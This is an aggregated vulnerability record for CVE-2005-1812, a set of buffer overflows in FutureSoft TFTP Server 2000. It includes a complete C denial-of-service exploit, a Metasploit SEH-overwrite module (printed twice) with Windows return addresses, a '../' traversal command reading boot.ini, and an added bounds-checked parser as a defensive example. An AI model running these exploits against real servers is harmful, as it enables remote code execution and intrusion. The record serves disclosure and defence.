CVE-2005-1812
CVSS 10.0
Published: 2005-06-01 00:00:00
Revised: 2008-09-05 00:00:00

[Original] Multiple stack-based buffer overflows in FutureSoft TFTP Server Evaluation Version 1.0.0.1 allow remote attackers to execute arbitrary code via a long (1) filename or (2) transfer mode string in a Read Request (RRQ) or Write Request (WRQ) packet.


[CNNVD] FutureSoft TFTP Server 2000 Remote Buffer Overflow Vulnerability (CNNVD-200506-015)

        TFTP Server 2000 is TFTP server software for the Windows platform that supports all RFC 1350-compliant clients.
        TFTP Server 2000 contains a buffer overflow when handling malformed file access requests; a remote attacker may exploit it to execute arbitrary instructions on the TFTP server.
        An overly long filename or type (transfer mode) field in a file access request overflows a buffer on the server, allowing arbitrary attacker-supplied instructions to execute and the attacker to gain control of the server.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may render the system completely unavailable]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1812
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1812
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200506-015
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/13821
(UNKNOWN)  BID  13821
http://www.security.org.sg/vuln/tftp2000-1001.html
(UNKNOWN)  MISC  http://www.security.org.sg/vuln/tftp2000-1001.html
http://securitytracker.com/id?1014079
(UNKNOWN)  SECTRACK  1014079
http://secunia.com/advisories/15539
(UNKNOWN)  SECUNIA  15539

- Vulnerability information

FutureSoft TFTP Server 2000 Remote Buffer Overflow Vulnerability
Critical  Buffer overflow
2005-06-01 00:00:00 2005-10-20 00:00:00
Remote
        TFTP Server 2000 is TFTP server software for the Windows platform that supports all RFC 1350-compliant clients.
        TFTP Server 2000 contains a buffer overflow when handling malformed file access requests; a remote attacker may exploit it to execute arbitrary instructions on the TFTP server.
        An overly long filename or type (transfer mode) field in a file access request overflows a buffer on the server, allowing arbitrary attacker-supplied instructions to execute and the attacker to gain control of the server.

- Advisories and patches

        The vendor has not yet released a patch or upgrade; users of this software are advised to monitor the vendor's home page for the latest version:
        http://www.futuresoft.com/products/lit-tftp2000.htm

- Vulnerability information (1027)

FutureSoft TFTP Server 2000 Remote Denial of Service Exploit (EDBID:1027)
windows dos
2005-06-02 Verified
0 ATmaCA
/*
*
* FutureSoft TFTP Server 2000 Remote Denial of Service Exploit
* http://www.futuresoft.com/products/lit-tftp2000.htm
* Bug Discovered by SIG^2 (http://www.security.org.sg)
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan
* Usage:tftp_exp <targetIp> [targetPort]
*
*/

/*
*
* Vulnerable Versions:
* TFTP Server 2000 Evaluation Version 1.0.0.1
*
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>  /* atoi, exit */
#include <string.h>  /* memcpy, memset */

#pragma comment(lib, "ws2_32.lib")

/* |RRQ|AAAAAAAAAAAAAAAA....|NULL|netasc|NULL| */
char expbuffer[] =
"\x00\x01"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x58\x58\x58\x58" /* EIP */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x6E\x65\x74\x61\x73\x63\x69"
"\x69\x00";

int main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent *pTarget;
        struct sockaddr_in sock;
        SOCKET mysocket;
        int destPORT = 69; /* default to the TFTP port, 69/udp */

        if (argc < 2){
                printf("FutureSoft TFTP Server 2000 Remote Denial of Service Exploit\n");
                printf("http://www.futuresoft.com/products/lit-tftp2000.htm\n");
                printf("Bug Discovered by SIG^2 (http://www.security.org.sg)\n");
                printf("Exploit coded By ATmaCA\n");
                printf("Web: atmacasoft.com && spyinstructors.com\n");
                printf("E-Mail: atmaca@icqmail.com\n");
                printf("Credit to kozan\n");
                printf("Usage:tftp_exp <targetIp> [targetPort]\n");
                return 1;
        }
        if (argc==3)
                destPORT=atoi(argv[2]);

        printf("Requesting Winsock...\n");
        wVersionRequested = MAKEWORD(1, 1);
        /* WSAStartup returns 0 on success and a positive error code on failure,
           so the original "< 0" test could never detect an error */
        if (WSAStartup(wVersionRequested, &wsaData) != 0) {
                printf("No winsock suitable version found!\n");
                return 1;
        }
        mysocket = socket(AF_INET, SOCK_DGRAM, 0);
        if(mysocket==INVALID_SOCKET){
                printf("Can't create UDP socket\n");
                exit(1);
        }
        printf("Resolving Hostnames...\n");
        /* the target host is argv[1]; the original resolved argv[2] (the optional port) */
        if ((pTarget = gethostbyname(argv[1])) == NULL){
                printf("Resolve of %s failed\n", argv[1]);
                exit(1);
        }
        memset(&sock, 0, sizeof(sock));
        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons(destPORT);

        printf("Connecting...\n");
        /* connect() on a UDP socket only fixes the peer address used by send() */
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
                printf("Couldn't connect to host.\n");
                exit(1);
        }

        printf("Connected!...\n");
        Sleep(10);

        /* sizeof(expbuffer) counts the string literal's implicit terminator; the
           packet's closing NUL is already the last byte of the literal, so send
           sizeof - 1 bytes (the original sent sizeof + 1 and read past the array) */
        printf("RRQ->Sending packet. Size: %d\n", (int)(sizeof(expbuffer) - 1));
        if (send(mysocket, expbuffer, sizeof(expbuffer) - 1, 0) == -1){
                printf("Error sending packet\n");
                closesocket(mysocket);
                exit(1);
        }
        printf("Packet sent........\n");
        printf("Success.\n");

        closesocket(mysocket);
        WSACleanup();
        return 0;
}

// milw0rm.com [2005-06-02]

- Vulnerability information (16344)

FutureSoft TFTP Server 2000 Transfer-Mode Overflow (EDBID:16344)
windows remote
2010-05-09 Verified
0 metasploit
##
# $Id: futuresoft_transfermode.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the FutureSoft TFTP Server
				2000 product. By sending an overly long transfer-mode string, we were able
				to overwrite both the SEH and the saved EIP. A subsequent write-exception
				that will occur allows the transferring of execution to our shellcode
				via the overwritten SEH. This module has been tested against Windows
				2000 Professional and for some reason does not seem to work against
				Windows 2000 Server (could not trigger the overflow at all).
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					['CVE', '2005-1812'],
					['OSVDB', '16954'],
					['BID', '13821'],
					['URL', 'http://www.security.org.sg/vuln/tftp2000-1001.html'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 350,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4} ], # ws2help.dll
					['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad} ], # ws2help.dll
					['Windows NT SP5/SP6a English',    { 'Ret' => 0x776a1799} ], # ws2help.dll
					['Windows 2003 Server English',    { 'Ret' => 0x7ffc0638} ], # PEB return
				],
			'Privileged'     => true,
			'DisclosureDate' => 'May 31 2005'))

		register_options(
			[
				Opt::RPORT(69)
			], self.class)

	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		sploit  = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"
		sploit += rand_text_english(167, payload_badchars)
		seh  = generate_seh_payload(target.ret)
		sploit[157, seh.length] = seh
		sploit += "\x00"

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end

- Vulnerability information (F83173)

FutureSoft TFTP Server 2000 Transfer-Mode Overflow (PacketStormID:F83173)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,shellcode
windows,2k
CVE-2005-1812

This Metasploit module exploits a stack overflow in the FutureSoft TFTP Server 2000 product. By sending an overly long transfer-mode string, we were able to overwrite both the SEH and the saved EIP. A subsequent write-exception that will occur allows the transferring of execution to our shellcode via the overwritten SEH. This Metasploit module has been tested against Windows 2000 Professional and for some reason does not seem to work against Windows 2000 Server (could not trigger the overflow at all).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the FutureSoft TFTP Server
				2000 product. By sending an overly long transfer-mode string, we were able
				to overwrite both the SEH and the saved EIP. A subsequent write-exception
				that will occur allows the transferring of execution to our shellcode
				via the overwritten SEH. This module has been tested against Windows
				2000 Professional and for some reason does not seem to work against
				Windows 2000 Server (could not trigger the overflow at all).
			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-1812'],
					['OSVDB', '16954'],
					['BID', '13821'],
					['URL', 'http://www.security.org.sg/vuln/tftp2000-1001.html'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 350,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4} ], # ws2help.dll
					['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad} ], # ws2help.dll
					['Windows NT SP5/SP6a English',    { 'Ret' => 0x776a1799} ], # ws2help.dll
					['Windows 2003 Server English',    { 'Ret' => 0x7ffc0638} ], # PEB return
				],
			'Privileged'     => true,
			'DisclosureDate' => 'May 31 2005'))

		register_options(
			[
				Opt::RPORT(69)
			], self.class)

	end

	def exploit
		connect_udp

		print_status("Trying target #{target.name}...")

		sploit  = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"
		sploit += rand_text_english(167, payload_badchars)
		seh  = generate_seh_payload(target.ret)
		sploit[157, seh.length] = seh
		sploit += "\x00"

		udp_sock.put(sploit)

		handler
		disconnect_udp
	end

end

- Vulnerability information

16954
FutureSoft TFTP Server 2000 Multiple Remote Overflows
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A remote overflow exists in TFTP Server 2000. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request containing an overly long filename or transfer-mode string, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-05-31 2005-05-18
2005-06-02 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Vulnerability information

FutureSoft TFTP Server 2000 Multiple Remote Vulnerabilities
Unknown 13821
Yes No
2005-05-31 12:00:00 2008-12-04 01:21:00
Discovery is credited to Tan Chew Keong.

- Affected program versions

FutureSoft TFTP Server 2000 1.0.0.1

- Vulnerability discussion

FutureSoft TFTP Server 2000 is affected by multiple remote vulnerabilities. Exploiting these issues can allow an attacker to retrieve arbitrary files and carry out buffer-overflow attacks.

The following specific issues were identified:

- Multiple buffer overflow vulnerabilities. A successful attack may allow the attacker to execute arbitrary code on a vulnerable computer and gain unauthorized access in the context of the server. A denial-of-service condition may arise as well.

- A directory-traversal vulnerability. A successful attack may allow the attacker to access arbitrary files (if the server has permissions to access the file).

These issues have been confirmed on TFTP Server 2000 Evaluation Version 1.0.0.1. Other versions may be affected as well.

- Exploit

The following proof-of-concept examples are available:

A crafted packet with an overly long filename string.
------------------------------------------
|RRQ|AAAAAAAAAAAAAAAA....|NULL|octet|NULL|
------------------------------------------

A crafted packet with an overly long transfer-mode string.
------------------------------------------
|RRQ|a.txt|NULL|AAAAAAAAAAAAAAA.....|NULL|
------------------------------------------

tftp -i 192.168.2.5 GET ../../../../../boot.ini

A Metasploit proof-of-concept exploit is available from y0@w00t-shell.net:

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
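As an added defender-side example (not code from this record, from the advisory authors or from FutureSoft), a bounds-checked parser for the |RRQ|filename|NULL|mode|NULL| layout drawn above: the length checks on the filename and transfer-mode fields are exactly what the vulnerable server lacks, and the constructed sample packets mirror the two overlong diagrams, the unterminated case and the ../ traversal request. The 255-byte filename limit is an assumed server-side policy, since RFC 1350 sets none.

```c
/* Added example, not part of the original record or of FutureSoft's code: a bounds-checked
 * parser for the RRQ/WRQ packets the advisory describes, i.e. the length check the vulnerable
 * server lacks. Layout: |opcode(2)|filename|NUL|mode|NUL|. MAX_FILENAME is an assumed limit. */
#include <stdint.h>
#include <string.h>
#include <strings.h>
#define TFTP_RRQ 1
#define TFTP_WRQ 2
#define MAX_FILENAME 255 /* assumed server-side limit; RFC 1350 sets none, so the server must */
#define MAX_MODE 8       /* longest legal mode is "netascii" */
struct tftp_request { uint16_t opcode; char filename[MAX_FILENAME + 1]; char mode[MAX_MODE + 1]; };
/* Copy one NUL-terminated field out of pkt[*off, len). Rejects (-1) a field that is unterminated
 * inside the packet, empty, or too long for dst: the check the vulnerable server did not make. */
static int read_field(const uint8_t *pkt, size_t len, size_t *off, char *dst, size_t dst_cap) {
    const uint8_t *start = pkt + *off;
    const uint8_t *nul = memchr(start, 0, len - *off); /* search bounded by the packet length */
    if (nul == NULL) return -1;
    size_t flen = (size_t)(nul - start);
    if (flen == 0 || flen >= dst_cap) return -1;
    memcpy(dst, start, flen);
    dst[flen] = '\0';
    *off += flen + 1;
    return 0;
}
/* Parse a request: 0 and *req filled on success, -1 for malformed, oversized or traversal. */
int parse_tftp_request(const uint8_t *pkt, size_t len, struct tftp_request *req) {
    size_t off = 2;
    if (len < 2) return -1;
    req->opcode = (uint16_t)((pkt[0] << 8) | pkt[1]);
    if (req->opcode != TFTP_RRQ && req->opcode != TFTP_WRQ) return -1;
    if (read_field(pkt, len, &off, req->filename, sizeof req->filename) != 0) return -1;
    if (read_field(pkt, len, &off, req->mode, sizeof req->mode) != 0) return -1;
    if (strcasecmp(req->mode, "octet") != 0 && strcasecmp(req->mode, "netascii") != 0) return -1;
    return strstr(req->filename, "..") == NULL ? 0 : -1; /* the advisory's ../ traversal case */
}
static size_t put_field(uint8_t *pkt, size_t n, const char *s) { /* append s plus its NUL */
    size_t l = strlen(s); memcpy(pkt + n, s, l); pkt[n + l] = 0; return n + l + 1;
}
int verdict_for_sample(int which) { /* constructed packets mirroring the advisory's diagrams */
    uint8_t pkt[600]; size_t n = 2; struct tftp_request req; pkt[0] = 0; pkt[1] = TFTP_RRQ;
    switch (which) {
    case 0: n = put_field(pkt, n, "a.txt"); n = put_field(pkt, n, "octet"); break;              /* legitimate */
    case 1: memset(pkt + n, 'A', 300); n += 300; pkt[n++] = 0; n = put_field(pkt, n, "octet"); break; /* long name */
    case 2: n = put_field(pkt, n, "a.txt"); memset(pkt + n, 'A', 200); n += 200; pkt[n++] = 0; break; /* long mode */
    case 3: n = put_field(pkt, n, "../../../../../boot.ini"); n = put_field(pkt, n, "octet"); break; /* traversal */
    default: n = put_field(pkt, n, "a.txt"); memcpy(pkt + n, "octet", 5); n += 5; break;       /* no final NUL */
    }
    return parse_tftp_request(pkt, n, &req);
}
```

Only sample 0 is accepted; the overlong filename, overlong mode, traversal and unterminated packets are all rejected before any fixed-size buffer is written.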

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.
